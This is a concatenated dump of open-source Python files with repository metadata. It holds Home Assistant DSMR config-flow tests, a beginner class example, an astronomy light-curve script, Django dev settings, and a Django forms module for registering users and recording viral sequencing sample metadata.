) = rfxtrx_dsmr_connection_send_validate_fixture
port = com_port()
result = await hass.config_entries.flow.async_init(
DOMAIN, context={"source": config_entries.SOURCE_USER}
)
first_timeout_wait_closed = AsyncMock(
return_value=True,
side_effect=chain([asyncio.TimeoutError], repeat(DEFAULT)),
)
protocol.wait_closed = first_timeout_wait_closed
first_timeout_wait_closed = AsyncMock(
return_value=True,
side_effect=chain([asyncio.TimeoutError], repeat(DEFAULT)),
)
rfxtrx_protocol.wait_closed = first_timeout_wait_closed
assert result["type"] == "form"
assert result["step_id"] == "user"
assert result["errors"] is None
result = await hass.config_entries.flow.async_configure(
result["flow_id"],
{"type": "Serial"},
)
assert result["type"] == "form"
assert result["step_id"] == "setup_serial"
assert result["errors"] == {}
with patch("homeassistant.components.dsmr.async_setup_entry", return_value=True):
result = await hass.config_entries.flow.async_configure(
result["flow_id"], {"port": port.device, "dsmr_version": "2.2"}
)
assert result["type"] == "form"
assert result["step_id"] == "setup_serial"
assert result["errors"] == {"base": "cannot_communicate"}
@patch("serial.tools.list_ports.comports", return_value=[com_port()])
async def test_setup_serial_wrong_telegram(
com_mock,
hass: HomeAssistant,
dsmr_connection_send_validate_fixture,
rfxtrx_dsmr_connection_send_validate_fixture,
) -> None:
"""Test failed telegram data."""
(connection_factory, transport, protocol) = dsmr_connection_send_validate_fixture
(
rfxtrx_connection_factory,
transport,
rfxtrx_protocol,
) = rfxtrx_dsmr_connection_send_validate_fixture
port = com_port()
result = await hass.config_entries.flow.async_init(
DOMAIN, context={"source": config_entries.SOURCE_USER}
)
assert result["type"] == "form"
assert result["step_id"] == "user"
assert result["errors"] is None
result = await hass.config_entries.flow.async_configure(
result["flow_id"],
{"type": "Serial"},
)
assert result["type"] == "form"
assert result["step_id"] == "setup_serial"
assert result["errors"] == {}
protocol.telegram = {}
rfxtrx_protocol.telegram = {}
result = await hass.config_entries.flow.async_configure(
result["flow_id"],
{"port": port.device, "dsmr_version": "2.2"},
)
assert result["type"] == "form"
assert result["step_id"] == "setup_serial"
assert result["errors"] == {"base": "cannot_communicate"}
async def test_options_flow(hass: HomeAssistant) -> None:
"""Test options flow."""
entry_data = {
"port": "/dev/ttyUSB0",
"dsmr_version": "2.2",
"precision": 4,
"reconnect_interval": 30,
}
entry = MockConfigEntry(
domain=DOMAIN,
data=entry_data,
unique_id="/dev/ttyUSB0",
)
entry.add_to_hass(hass)
result = await hass.config_entries.options.async_init(entry.entry_id)
assert result["type"] == "form"
assert result["step_id"] == "init"
result = await hass.config_entries.options.async_configure(
result["flow_id"],
user_input={
"time_between_update": 15,
},
)
with patch(
"homeassistant.components.dsmr.async_setup_entry", return_value=True
), patch("homeassistant.components.dsmr.async_unload_entry", return_value=True):
assert result["type"] == data_entry_flow.FlowResultType.CREATE_ENTRY
await hass.async_block_till_done()
assert entry.options == {"time_between_update": 15}
def test_get_serial_by_id_no_dir() -> None:
"""Test serial by id conversion if there's no /dev/serial/by-id."""
p1 = patch("os.path.isdir", MagicMock(return_value=False))
p2 = patch("os.scandir")
with p1 as is_dir_mock, p2 as scan_mock:
res = config_flow.get_serial_by_id(sentinel.path)
assert res is sentinel.path
assert is_dir_mock.call_count == 1
assert scan_mock.call_count == 0
def test_get_serial_by_id() -> None:
"""Test serial by id conversion."""
p1 = patch("os.path.isdir", MagicMock(return_value=True))
p2 = patch("os.scandir")
def _realpath(path):
if path is sentinel.matched_link:
return sentinel.path
return sentinel.serial_link_path
p3 = patch("os.path.realpath", side_effect=_realpath)
with p1 as is_dir_mock, p2 as scan_mock, p3:
res = config_flow.get_serial_by_id(sentinel.path)
assert res is sentinel.path
assert is_dir_mock.call_count == 1
assert scan_mock.call_count == 1
entry1 = MagicMock(spec_set=os.DirEntry)
entry1.is_symlink.return_value = True
entry1.path = sentinel.some_path
entry2 = MagicMock(spec_set=os.DirEntry)
entry2.is_symlink.return_value = False
entry2.path = sentinel.other_path
entry3 = MagicMock(spec_set=os.DirEntry)
entry3.is_symlink.return_value = True
entry3.path = sentinel.matched_link
scan_mock.return_value = [entry1, entry2, entry3]
res = config_flow.get_serial_by_id(sentinel.path)
assert res is sentinel.matched_link
assert is_dir_mock.call_count == 2
assert scan_mock.call_count == 2
| [
"[email protected]"
] | |
da3148eda0d51e3d5d6c53ed95cca7d8fd467839 | 75ce5b7fee397fe4e67ed15a58f4cd42e0f8de9f | /PythonMasterclass/OOP/oop.py | 8f9a4c844627350a4a88b461ec85cf8bb780bbce | [] | no_license | lukbast/stuff | 7fd03b7e035394802c307682a25621dfd667960b | 160e1d77d1b592fac099b9c7139fb4e2f7f8dbbe | refs/heads/main | 2023-08-06T21:39:55.334812 | 2021-09-23T17:37:47 | 2021-09-23T17:37:47 | 409,684,114 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 798 | py | class Kettle(object):
power_source = 'electricity'
def __init__(self, make, price):
self.make = make
self.price = price
self.on = False
def turn_on(self):
self.on = True
philips = Kettle('Philips', 420)
kenwood = Kettle('Kenwood', 9.99)
kenwood.price = 666
print(kenwood.price)
kenwood.turn_on()
print(kenwood.on)
print('Kettle: {0.make}, for {0.price}, isOn: {0.on}'.format(kenwood))
# In piton you can add new attributes to a object like this
kenwood.color = 'magenta'
print(kenwood.color)
# DUN DUN DUN
print(philips.power_source)
print(kenwood.power_source)
kenwood.power_source = 'hamsters'
print(kenwood.power_source)
print(philips.power_source)
Kettle.power_source = 'Atomic'
print(kenwood.power_source)
print(philips.power_source)
| [
"[email protected]"
] | |
3e64394d796a026c719123cf7ef89bcb82365121 | 9e988c0dfbea15cd23a3de860cb0c88c3dcdbd97 | /sdBs/AllRun/sdssj_120408.22+153609.7/sdB_sdssj_120408.22+153609.7_lc.py | 45c4a65ca1273ffe327210776740e7315636db7c | [] | no_license | tboudreaux/SummerSTScICode | 73b2e5839b10c0bf733808f4316d34be91c5a3bd | 4dd1ffbb09e0a599257d21872f9d62b5420028b0 | refs/heads/master | 2021-01-20T18:07:44.723496 | 2016-08-08T16:49:53 | 2016-08-08T16:49:53 | 65,221,159 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 370 | py | from gPhoton.gAperture import gAperture
def main():
gAperture(band="NUV", skypos=[181.03425,15.602694], stepsz=30., csvfile="/data2/fleming/GPHOTON_OUTPU/LIGHTCURVES/sdBs/sdB_sdssj_120408.22+153609.7/sdB_sdssj_120408.22+153609.7_lc.csv", maxgap=1000., overwrite=True, radius=0.00555556, annulus=[0.005972227,0.0103888972], verbose=3)
if __name__ == "__main__":
main()
| [
"[email protected]"
] | |
8d062e70c1250414eb462291082fec9b977fc54e | 80199ed4dd0d072140160a785932c35952105b19 | /miller/api/serializers/__init__.py | c25a1b7e375a9e4c48c04feabf33e4b2f2d6833d | [] | no_license | C2DH/miller | 7d90bb6bdfec0ab37cea80480c783dc850e33d19 | 5263a9e392249f6515e74dd45b92957bd6e9e1a7 | refs/heads/miller-v2 | 2023-06-01T20:51:37.167091 | 2023-05-15T13:48:03 | 2023-05-15T13:48:03 | 89,341,967 | 1 | 3 | null | 2023-05-15T13:46:16 | 2017-04-25T09:23:29 | Python | UTF-8 | Python | false | false | 41 | py | from .story import CreateStorySerializer
| [
"[email protected]"
] | |
ce9e81e2b51bb97642a79f8b467a2770571ede66 | eea1be5dbac7fa10167eae167eb6712e3937f53a | /voidcoin/settings/dev.py | 70ec86d6e913a5df701dd36881e48c14a73f0cf7 | [] | no_license | chidimo/Voidcoin | 40962e46661b2a7106bd8e60d0830c3b9629b8fa | 227c160dfa671818522781aab013f2d1fcb098a9 | refs/heads/develop | 2022-12-09T17:40:26.294425 | 2019-07-04T08:32:20 | 2019-07-04T08:32:20 | 135,197,447 | 5 | 2 | null | 2022-12-08T02:08:45 | 2018-05-28T18:45:19 | Python | UTF-8 | Python | false | false | 1,964 | py | from .base import *
DEBUG = True
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.postgresql_psycopg2',
'NAME': 'voidcoin',
'USER': 'postgres',
'PASSWORD': config('DEV_DB_PASSWORD'),
'HOST': 'localhost',
'PORT': 5432
}
}
EMAIL_BACKEND = 'django.core.mail.backends.console.EmailBackend'
INSTALLED_APPS += ['debug_toolbar']
DEBUG_TOOLBAR_PANELS = [
'debug_toolbar.panels.versions.VersionsPanel',
'debug_toolbar.panels.timer.TimerPanel',
'debug_toolbar.panels.settings.SettingsPanel',
'debug_toolbar.panels.headers.HeadersPanel',
'debug_toolbar.panels.request.RequestPanel',
'debug_toolbar.panels.sql.SQLPanel',
'debug_toolbar.panels.staticfiles.StaticFilesPanel',
'debug_toolbar.panels.templates.TemplatesPanel',
'debug_toolbar.panels.cache.CachePanel',
'debug_toolbar.panels.signals.SignalsPanel',
'debug_toolbar.panels.logging.LoggingPanel',
'debug_toolbar.panels.redirects.RedirectsPanel',
]
MIDDLEWARE += [
'debug_toolbar.middleware.DebugToolbarMiddleware',
]
# LOGGING = {
# 'version': 1,
# 'disable_existing_loggers': False,
# 'formatters': {
# 'verbose': {
# 'format' : "[%(asctime)s] %(levelname)s [%(name)s:%(lineno)s] %(message)s",
# 'datefmt' : "%d/%b/%Y %H:%M:%S"
# },
# 'simple': {
# 'format': '%(levelname)s %(message)s'
# },
# },
# 'handlers': {
# 'file': {
# 'level': 'DEBUG',
# 'class': 'logging.FileHandler',
# 'filename': os.path.join(BASE_DIR, 'voidcoin_dev.log'),
# 'formatter': 'verbose'
# },
# },
# 'loggers': {
# 'django': {
# 'handlers':['file'],
# 'propagate': True,
# 'level':'DEBUG',
# },
# 'MYAPP': {
# 'handlers': ['file'],
# 'level': 'DEBUG',
# },
# }
# }
| [
"[email protected]"
] | |
3f4d4b142fe225bb204064c1dbfc8857e1c172fe | 93a613f09d564a1d45ecc01b54b73745ce2850b7 | /majora2/forms.py | 6adcc2da009d17ffe9c9c4e06700d45aa3e7b5d8 | [] | no_license | pythseq/majora | fa17c77fa8a916c688fd2b40744d768dd851b99b | 40b918d32b4061cddee5f7279f97e70eb894623d | refs/heads/master | 2022-12-23T20:09:41.233844 | 2020-09-28T18:18:42 | 2020-09-28T18:18:42 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 35,308 | py | import datetime
from django import forms
from django.contrib.auth.models import User
from django.db.models import Q
from django.utils import timezone
from crispy_forms.helper import FormHelper
from crispy_forms.layout import Layout, Fieldset, Submit, Row, Column
from crispy_forms.bootstrap import FormActions
from .account_views import generate_username
from . import models
from . import fixed_data
import re
from sshpubkeys import SSHKey
def majora_clean_ssh_key(ssh_key):
if ssh_key:
ssh_key = "".join(ssh_key.splitlines()).strip()
key = SSHKey(ssh_key)
try:
key.parse()
except Exception as e:
raise forms.ValidationError("Unable to decode your key. Please ensure this is your public key and has been entered correctly.")
if key.key_type != b'ssh-ed25519':
raise forms.ValidationError("This system accepts ed25519 keys only.")
return ssh_key
class CreditForm(forms.Form):
#TODO samstudio8: There is a condition where the max_length can be overrun as we append the site name, reduce this field maxlen by 4+1 to account for the general case of a 4 letter side code and :
credit_code = forms.CharField(max_length=19, required=True, help_text="A short string to refer to this credit list when uploading metadata. This need not match an existing site name, or barcode. Note that this will automatically be prefixed by your site identifier.")
lab_name = forms.CharField(max_length=512, required=True, label="Originating lab name(s)", help_text="The name or names of originating labs you would like to credit")
lab_addr = forms.CharField(max_length=512, required=True, label="Originating lab address(es)", help_text="Use the broadest address that encompasses all the originating labs")
lab_list = forms.CharField(max_length=2048, required=False, widget=forms.Textarea(attrs={"rows": 5}), label="Author list")
delete = forms.BooleanField(required=False, label="Delete", help_text="Tick this to remove this Credit from your Institute")
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.helper = FormHelper()
self.helper.layout = Layout(
Fieldset("Credit",
Row(
Column('credit_code', css_class="form-group col-md-4 mb-0"),
css_class="form-row",
),
Row(
Column('lab_name', css_class="form-group col-md-6 mb-0"),
Column('lab_addr', css_class="form-group col-md-6 mb-0"),
css_class="form-row",
),
Row(
Column('lab_list', css_class="form-group col-md-12 mb-0"),
css_class="form-row",
),
Row(
Column('delete', css_class="form-group col-md-6 mb-0"),
css_class="form-row",
),
),
FormActions(
Submit('save', 'Save'),
css_class="text-right",
)
)
class InstituteForm(forms.Form):
name = forms.CharField(max_length=100, disabled=True, required=False)
code = forms.CharField(max_length=10, disabled=True, required=False)
gisaid_opted = forms.BooleanField(required=False, label="GISAID Opt-in", help_text="Check this box to opt-in to COG-UK automated submissions to GISAID")
gisaid_user = forms.CharField(max_length=100, required=False, label="GISAID username", help_text="Submissions will be sent on behalf of this user")
gisaid_mail = forms.EmailField(required=False, label="E-mail address", help_text="E-mail address to share with GISAID curators")
gisaid_lab_name = forms.CharField(max_length=512, required=False, label="Originating lab name(s)", help_text="The name or names of originating labs you would like to credit")
gisaid_lab_addr = forms.CharField(max_length=512, required=False, label="Originating lab address(es)", help_text="Use the broadest address that encompasses all the originating labs")
gisaid_list = forms.CharField(max_length=2048, required=False, widget=forms.Textarea(attrs={"rows": 5}), label="Author list")
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.helper = FormHelper()
self.helper.layout = Layout(
Fieldset("Institute",
Row(
Column('code', css_class="form-group col-md-2 mb-0"),
Column('name', css_class="form-group col-md-10 mb-0"),
css_class="form-row",
),
Row(
Column('gisaid_opted', css_class="form-group col-md-6 mb-0"),
css_class="form-row",
)
),
Fieldset("GISAID: User",
Row(
Column('gisaid_user', css_class="form-group col-md-6 mb-0"),
Column('gisaid_mail', css_class="form-group col-md-6 mb-0"),
css_class="form-row",
)
),
Fieldset("GISAID: Originating Lab",
Row(
Column('gisaid_lab_name', css_class="form-group col-md-6 mb-0"),
Column('gisaid_lab_addr', css_class="form-group col-md-6 mb-0"),
css_class="form-row",
)
),
Fieldset("GISAID: Authors",
'gisaid_list'
),
FormActions(
Submit('save', 'Save'),
css_class="text-right",
)
)
def clean(self):
cleaned_data = super().clean()
if cleaned_data.get("gisaid_opted", False):
for field in ["gisaid_user", "gisaid_mail", "gisaid_lab_name", "gisaid_lab_addr", "gisaid_list"]:
if not cleaned_data.get(field):
self.add_error(field, "Required if opting-in to GISAID submissions")
if cleaned_data.get("gisaid_user"):
if not cleaned_data.get("gisaid_opted"):
self.add_error("gisaid_opted", "Check this box to opt-in to GISAID submissions")
class AccountForm(forms.Form):
username = forms.CharField(max_length=150, disabled=True, required=False, help_text="You cannot change your username")
first_name = forms.CharField(max_length=30)
last_name = forms.CharField(max_length=150)
email = forms.EmailField()
organisation = forms.ModelChoiceField(queryset=models.Institute.objects.exclude(code__startswith="?").order_by("code"), disabled=True, required=False, help_text="You cannot change your organisation", to_field_name="code")
ssh_key = forms.CharField(widget=forms.Textarea(attrs={"rows": 5}), label="SSH Public Key.</br>This system accepts ed25519 keys only. To generate one, run this command: <code>ssh-keygen -o -a 100 -t ed25519</code>", help_text="If you do not need access to CLIMB servers over SSH to upload sequence data or access resources, you can leave this blank. You can add an SSH key later but will need to notify us.", required=False)
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.helper = FormHelper()
self.helper.layout = Layout(
Fieldset("User",
Row(
Column('username', css_class="form-group col-md-6 mb-0"),
Column('email', css_class="form-group col-md-6 mb-0"),
css_class="form-row",
),
),
Fieldset("Name",
Row(
Column('first_name', css_class="form-group col-md-6 mb-0"),
Column('last_name', css_class="form-group col-md-6 mb-0"),
css_class="form-row",
)
),
Fieldset("Organisation",
Row(
Column('organisation', css_class="form-group col-md-6 mb-0"),
css_class="form-row",
)
),
Fieldset("SSH Key",
'ssh_key'
),
FormActions(
Submit('save', 'Update'),
css_class="text-right",
)
)
def clean(self):
cleaned_data = super().clean()
def clean_ssh_key(self):
return majora_clean_ssh_key(self.cleaned_data.get("ssh_key"))
class RegistrationForm(forms.Form):
username = forms.CharField(max_length=150, disabled=True, required=False)
first_name = forms.CharField(max_length=30)
last_name = forms.CharField(max_length=150)
email = forms.EmailField()
password1 = forms.CharField(widget=forms.PasswordInput(), label="Password", min_length=8)
password2 = forms.CharField(widget=forms.PasswordInput(), label="Confirm password", min_length=8)
organisation = forms.ModelChoiceField(queryset=models.Institute.objects.exclude(code__startswith="?").order_by("code"))
ssh_key = forms.CharField(widget=forms.Textarea(attrs={"rows": 5}), label="SSH Public Key.</br>This system accepts ed25519 keys only. To generate one, run this command: <code>ssh-keygen -o -a 100 -t ed25519</code>", help_text="If you do not need access to CLIMB servers over SSH to upload sequence data or access resources, you can leave this blank. You can add an SSH key later but will need to notify us.", required=False)
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.helper = FormHelper()
self.helper.layout = Layout(
Fieldset("User",
Row(
Column('username', css_class="form-group col-md-6 mb-0"),
Column('email', css_class="form-group col-md-6 mb-0"),
css_class="form-row",
),
Row(
Column('password1', css_class="form-group col-md-6 mb-0"),
Column('password2', css_class="form-group col-md-6 mb-0"),
css_class="form-row",
)
),
Fieldset("Name",
Row(
Column('first_name', css_class="form-group col-md-6 mb-0"),
Column('last_name', css_class="form-group col-md-6 mb-0"),
css_class="form-row",
)
),
Fieldset("Organisation",
Row(
Column('organisation', css_class="form-group col-md-6 mb-0"),
css_class="form-row",
)
),
Fieldset("SSH Key",
'ssh_key'
),
FormActions(
Submit('save', 'Register'),
css_class="text-right",
)
)
def clean(self):
cleaned_data = super().clean()
if cleaned_data.get("password1") != cleaned_data.get("password2"):
self.add_error("password1", "Passwords do not match.")
self.add_error("password2", "Passwords do not match.")
if User.objects.filter(username=generate_username(cleaned_data)).count() > 0:
#raise forms.ValidationError('This username has already been registered. You may be in the approval queue.')
self.add_error("username", 'This username has already been registered. You may be in the approval queue.')
def clean_ssh_key(self):
return majora_clean_ssh_key(self.cleaned_data.get("ssh_key"))
class M2Metric_SequenceForm(forms.ModelForm):
class Meta:
model = models.TemporaryMajoraArtifactMetric_Sequence
exclude = []
class M2Metric_MappingForm(forms.ModelForm):
class Meta:
model = models.TemporaryMajoraArtifactMetric_Mapping
exclude = []
class M2Metric_MappingTileForm(forms.ModelForm):
class Meta:
model = models.TemporaryMajoraArtifactMetric_Mapping_Tiles
exclude = []
class M2Metric_ThresholdCycleForm(forms.ModelForm):
class Meta:
model = models.TemporaryMajoraArtifactMetric_ThresholdCycle
exclude = []
class M2MetricRecord_ThresholdCycleForm(forms.Form): # should probably be a modelform, but w/e
artifact_metric = forms.ModelChoiceField(queryset=models.TemporaryMajoraArtifactMetric_ThresholdCycle.objects.all(), required=True)
ct_value = forms.FloatField(required=True, min_value=0.0)
test_kit = forms.ChoiceField(
choices=[
(None, ""),
("ALTONA", "ALTONA"),
("ABBOTT", "ABBOTT"),
("ROCHE", "ROCHE"),
("AUSDIAGNOSTICS", "AUSDIAGNOSTICS"),
("BOSPHORE", "BOSPHORE"),
("INHOUSE", "INHOUSE"),
("SEEGENE", "SEEGENE"),
("VIASURE", "VIASURE"),
("BD", "BD"),
("XPERT", "XPERT"),
],
required=False,
)
test_platform = forms.ChoiceField(
choices=[
(None, ""),
("ALTOSTAR_AM16", "ALTOSTAR_AM16"),
("ABBOTT_M2000", "ABBOTT_M2000"),
("APPLIED_BIO_7500", "APPLIED_BIO_7500"),
("ROCHE_FLOW", "ROCHE_FLOW"),
("ROCHE_COBAS", "ROCHE_COBAS"),
("ELITE_INGENIUS", "ELITE_INGENIUS"),
("CEPHEID_XPERT", "CEPHEID_XPERT"),
("QIASTAT_DX", "QIASTAT_DX"),
("AUSDIAGNOSTICS", "AUSDIAGNOSTICS"),
("ROCHE_LIGHTCYCLER", "ROCHE_LIGHTCYCLER"),
("INHOUSE", "INHOUSE"),
("ALTONA", "ALTONA"),
("PANTHER", "PANTHER"),
("SEEGENE_NIMBUS", "SEEGENE_NIMBUS"),
("QIAGEN_ROTORGENE", "QIAGEN_ROTORGENE"),
("BD_MAX", "BD_MAX"),
],
required=False,
)
test_target = forms.ChoiceField(
choices=[
(None, ""),
("S", "S"),
("E", "E"),
("N", "N"),
("RDRP","RDRP"),
("ORF1AB", "ORF1AB"),
("ORF8", "ORF8"),
("RDRP+N", "RDRP+N"),
],
required=False,
)
class TestMetadataForm(forms.Form):
artifact = forms.ModelChoiceField(queryset=models.MajoraArtifact.objects.all(), required=False, to_field_name="dice_name")
group = forms.ModelChoiceField(queryset=models.MajoraArtifactGroup.objects.all(), required=False, to_field_name="dice_name")
process = forms.ModelChoiceField(queryset=models.MajoraArtifactProcess.objects.all(), required=False)
#pgroup
tag = forms.CharField(max_length=64)
name = forms.CharField(max_length=64)
value = forms.CharField(max_length=128)
timestamp = forms.DateTimeField()
def clean(self):
cleaned_data = super().clean()
if not (cleaned_data.get("artifact") or cleaned_data.get("group") or cleaned_data.get("process")):
msg = "You must provide one 'artifact', 'group' or 'process' to attach metadata to"
self.add_error("artifact", msg)
self.add_error("group", msg)
self.add_error("process", msg)
class TestLibraryForm(forms.Form):
library_name = forms.CharField(max_length=48, min_length=5)
library_layout_config = forms.ChoiceField(
choices=[
(None, ""),
("SINGLE", "SINGLE"),
("PAIRED", "PAIRED"),
],
)
library_layout_read_length = forms.IntegerField(min_value=0, required=False)
library_layout_insert_length = forms.IntegerField(min_value=0, required=False)
library_seq_kit = forms.CharField(max_length=48)
library_seq_protocol = forms.CharField(max_length=48)
class TestLibraryBiosampleForm(forms.Form):
central_sample_id = forms.ModelChoiceField(queryset=models.BiosampleArtifact.objects.all(), required=True, to_field_name="dice_name")
library_name = forms.ModelChoiceField(queryset=models.LibraryArtifact.objects.all(), required=True, to_field_name="dice_name")
barcode = forms.CharField(max_length=24, required=False)
library_strategy = forms.ChoiceField(
choices=[
(None, ""),
("WGS", "WGS: Whole Genome Sequencing"),
("WGA", "WGA: Whole Genome Amplification"),
("AMPLICON", "AMPLICON: Sequencing of overlapping or distinct PCR or RT-PCR products"),
("TARGETED_CAPTURE", "TARGETED_CAPTURE: Enrichment of a targeted subset of loci"),
("OTHER", "?: Library strategy not listed"),
],
)
library_source = forms.ChoiceField(
choices=[
(None, ""),
("GENOMIC", "GENOMIC"),
("TRANSCRIPTOMIC", "TRANSCRIPTOMIC"),
("METAGENOMIC", "METAGENOMIC"),
("METATRANSCRIPTOMIC", "METATRANSCRIPTOMIC"),
("VIRAL_RNA", "VIRAL RNA"),
("OTHER", "?: Other, unspecified, or unknown library source material"),
],
)
library_selection = forms.ChoiceField(
choices=[
(None, ""),
("RANDOM", "RANDOM: No Selection or Random selection"),
("PCR", "PCR: Enrichment via PCR"),
("RANDOM_PCR", "RANDOM-PCR: Source material was selected by randomly generated primers"),
("OTHER", "?: Other library enrichment, screening, or selection process"),
],
)
library_primers = forms.CharField(max_length=48, required=False)
library_protocol = forms.CharField(max_length=48, required=False)
class TestSequencingForm(forms.Form):
library_name = forms.ModelChoiceField(queryset=models.LibraryArtifact.objects.all(), required=True, to_field_name="dice_name")
sequencing_id = forms.UUIDField(required=False)
run_name = forms.CharField(max_length=128, required=False, min_length=5)
run_group = forms.CharField(max_length=128, required=False)
instrument_make = forms.ChoiceField(
label="Instrument Make",
choices=[
(None, ""),
("ILLUMINA", "Illumina"),
("OXFORD_NANOPORE", "Oxford Nanopore"),
("PACIFIC_BIOSCIENCES", "Pacific Biosciences"),
],
)
instrument_model = forms.CharField(
label="Instrument Model",
)
flowcell_type = forms.CharField(max_length=48, required=False)
#flowcell_version = forms.CharField(max_length=48)
flowcell_id = forms.CharField(max_length=48, required=False)
start_time = forms.DateTimeField(input_formats=["%Y-%m-%d %H:%M"], required=False)
end_time = forms.DateTimeField(input_formats=["%Y-%m-%d %H:%M"], required=False)
@staticmethod
def modify_preform(data):
UPPERCASE_FIELDS = [
"instrument_make",
]
for field in UPPERCASE_FIELDS:
if data.get(field):
data[field] = data[field].upper().strip().replace(' ', '_')
return data
def clean(self):
run_name = self.cleaned_data.get("run_name")
if not self.cleaned_data.get("sequencing_id"):
if not run_name:
self.add_error("run_name", "If you don't provide a sequencing_id, you must provide a run_name")
reserved_ch = [".", "/", "\\"]
for ch in reserved_ch:
if ch in run_name:
self.add_error("run_name", "run_name cannot contain a reserved character: %s" % str(reserved_ch))
break
class TestSampleForm(forms.Form):
biosample_source_id = forms.CharField(
label="Pseudonymous patient identifier", max_length=56,
help_text="Leave blank if not available. <b>DO NOT enter an NHS number here</b>", required=False)
root_sample_id = forms.CharField(
label="Health Agency sample identifier", max_length=56, required=False,
help_text="Leave blank if not applicable or available. It will not be possible to collect private metadata for this sample without this"
)
sender_sample_id = forms.CharField(
label="Local sample identifier", max_length=56, required=False,
help_text="Leave blank if not applicable or available. It will not be possible to collect private metadata for this sample without this"
)
central_sample_id = forms.CharField(
label="New sample identifier", max_length=56, min_length=5,
help_text="Heron barcode assigned by WSI"
)
collection_date = forms.DateField(
label="Collection date",
help_text="YYYY-MM-DD",
required=False,
)
received_date = forms.DateField(
label="Received date",
help_text="YYYY-MM-DD",
required=False,
)
country = forms.CharField(disabled=True)
adm1 = forms.ChoiceField(
label="Region",
choices=[
(None, ""),
("UK-ENG", "England"),
("UK-SCT", "Scotland"),
("UK-WLS", "Wales"),
("UK-NIR", "Northern Ireland"),
],
)
source_age = forms.IntegerField(min_value=0, required=False, help_text="Age in years")
source_sex = forms.ChoiceField(choices=[
(None, ""),
("F", "F"),
("M", "M"),
("Other", "Other"),
], required=False, help_text="Reported sex")
adm2 = forms.CharField(
label="County",
max_length=100,
required=False,
help_text="Enter the COUNTY from the patient's address. Leave blank if this was not available."
)
#adm2 = forms.ModelChoiceField(
# queryset=models.County.objects.all(),
# to_field_name="name",
# label="County",
# required=False,
# help_text="Enter the COUNTY from the patient's address. Leave blank if this was not available."
#)
adm2_private = forms.CharField(
label="Outward postcode",
max_length=10,
required=False,
help_text="Enter the <b>first part</b> of the patients home postcode. Leave blank if this was not available."
)
submitting_user = forms.CharField(disabled=True, required=False)
submitting_org = forms.ModelChoiceField(queryset=models.Institute.objects.exclude(code__startswith="?").order_by("name"), disabled=True, required=False)
collecting_org = forms.CharField(max_length=100, required=False, help_text="The site that this sample was collected by. Use the first line of the 'sender' from the corresponding E28")
source_type = forms.ChoiceField(
choices = [
("human", "human"),
],
disabled = True,
)
source_taxon = forms.CharField(
max_length=24,
disabled=True,
)
sample_type_collected = forms.ChoiceField(
choices= [
(None, "Unknown"),
("dry swab", "dry swab"),
("swab", "swab"),
("aspirate", "aspirate"),
("sputum", "sputum"),
("BAL", "BAL"),
],
required=False,
)
sample_type_received = forms.ChoiceField(
choices= [
(None, "Unknown"),
("primary", "primary"),
("extract", "extract"),
("lysate", "lysate"),
("culture", "culture"),
],
required=False,
)
swab_site = forms.ChoiceField(
choices= [
(None, None),
("nose", "nose"),
("throat", "throat"),
("nose-throat", "nose and throat"),
("endotracheal", "endotracheal"),
("rectal", "rectal"),
],
help_text="Provide only if sample_type_collected is swab",
required=False,
)
#override_heron = forms.BooleanField(
# label="Override Heron validator",
# help_text="Enable this checkbox if your sample has not been assigned a Heron identifier. <i>e.g.</i> The sample has already been submitted to GISAID",
# required=False)
#secondary_identifier = forms.CharField(
# max_length=256,
# label="GISAID identifier string",
# help_text="New COG-UK samples will have GISAID strings automatically composed. If this sample has already been submitted to GISAID, provide the identifier here.",
# required=False)
#secondary_accession = forms.CharField(
# max_length=256,
# label="GISAID accession",
# help_text="If this sample has already been submitted to GISAID, provide the accession here.",
# required=False)
#tube_dice = forms.CharField()
#box_dice = forms.CharField()
#tube_x = forms.IntegerField()
#tube_y = forms.IntegerField()
#current_sample_type = forms.ChoiceField()
#accepted = forms.BooleanField()
#quarantine_reason = forms.ChoiceField()
#received_date =
#TODO Extra COGUK supplemental fields
# In an ideal world where we have more time, we'd pin a bunch of supplemental modelforms but we need this asappppp
is_surveillance = forms.NullBooleanField()
is_hcw = forms.NullBooleanField()
employing_hospital_name = forms.CharField(max_length=100, required=False)
employing_hospital_trust_or_board = forms.CharField(max_length=100, required=False)
is_hospital_patient = forms.NullBooleanField()
is_icu_patient = forms.NullBooleanField()
admission_date = forms.DateField(
label="Received date",
help_text="YYYY-MM-DD",
required=False,
)
admitted_hospital_name = forms.CharField(max_length=100, required=False)
admitted_hospital_trust_or_board = forms.CharField(max_length=100, required=False)
is_care_home_worker = forms.NullBooleanField()
is_care_home_resident = forms.NullBooleanField()
anonymised_care_home_code = forms.CharField(max_length=10, required=False)
admitted_with_covid_diagnosis = forms.NullBooleanField()
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.helper = FormHelper()
self.helper.layout = Layout(
Fieldset("Identifiers",
Row(
Column('biosample_source_id', css_class="form-group col-md-3 mb-0"),
Column('root_sample_id', css_class="form-group col-md-3 mb-0"),
Column('sender_sample_id', css_class="form-group col-md-3 mb-0"),
Column('central_sample_id', css_class="form-group col-md-3 mb-0"),
css_class="form-row",
)
),
Fieldset("Form",
Row(
Column('source_type', css_class="form-group col-md-3 mb-0"),
Column('source_taxon', css_class="form-group col-md-3 mb-0"),
Column('sample_type_collected', css_class="form-group col-md-2 mb-0"),
Column('swab_site', css_class="form-group col-md-2 mb-0"),
Column('sample_type_received', css_class="form-group col-md-2 mb-0"),
css_class="form-row",
)
),
Fieldset("Locality",
Row(
Column('country', css_class="form-group col-md-3 mb-0"),
Column('adm1', css_class="form-group col-md-2 mb-0"),
Column('adm2', css_class="form-group col-md-4 mb-0"),
Column('adm2_private', css_class="form-group col-md-3 mb-0"),
css_class="form-row",
)
),
Fieldset("Key information",
Row(
Column('collection_date', css_class="form-group col-md-3 mb-0"),
Column('received_date', css_class="form-group col-md-3 mb-0"),
Column('age', css_class="form-group col-md-2 mb-0"),
Column('sex', css_class="form-group col-md-2 mb-0"),
css_class="form-row",
),
),
Fieldset("Collecting and sequencing",
Row(
Column('collecting_org', css_class="form-group col-md-5 mb-0"),
